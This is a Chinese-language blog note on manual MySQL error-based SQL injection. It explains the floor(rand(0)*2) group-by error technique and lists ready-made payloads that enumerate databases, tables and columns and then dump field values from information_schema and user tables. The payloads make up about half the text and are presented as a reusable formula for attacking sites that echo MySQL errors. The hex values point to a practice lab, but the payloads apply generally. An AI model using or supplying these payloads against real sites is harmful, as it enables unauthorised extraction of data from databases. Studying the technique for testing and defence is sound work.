mysql報錯注入手工方法

之前以爲報錯注入有那麼一長串，還有各類concat(),rand()之類的函數，不方便記憶和使用，一直沒怎麼仔細的學習過。此次專門學習了一下，看了一些大牛的總結，獲得一些經驗，特此記錄下來，以備後續鞏固複習。

 

整體來講，報錯注入實際上是一種公式化的注入方法，主要用於在頁面中沒有顯示位，可是用echo mysql_error();輸出了錯誤信息時使用。

公式具體以下

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

咱們在這個語句中其實已經能夠看到了普通注入的影子，第五個select子句的version()處顯示了數據庫使用的版本，後面的information_schema.tables顯示的就是咱們在mysql中對應的系統表信息，第三個子句的limit用於控制遍歷數據庫的每一條記錄。

注意的是，咱們通常手工注入使用limit時，都是使用limit 0,1;limit,1,2;limit 2,3……這種模式去依次遍歷數據庫的每一個項目。

可是要注意這裏的遍歷方式須要調整：變成了limit 0,1;limit1,1;limit 2,1……這種形式

 

搞清楚了語句的公式，剩下的注入過程就跟咱們普通的注入很像了，只須要調整語句對應的結構便可：

彙總以下：

一、暴數據庫：

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,schema_name,0x7e))) from information_schema.schemata  limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

 

二、暴數據表：

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,table_name,0x7e))) from information_schema.tables where table_schema=庫名的十六進制  limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

 

三、暴列名：

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,column_name,0x7e))) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

 

四、暴字段：

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,字段名,0x7e))) from 庫名.表名 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

總結起來，就是一套已經成型的公式，而後用普通注入的方法進行注入就行了

 

參考文章：

http://www.jianshu.com/p/8c2343705100

https://www.waitalone.cn/mysql-error-based-injection.html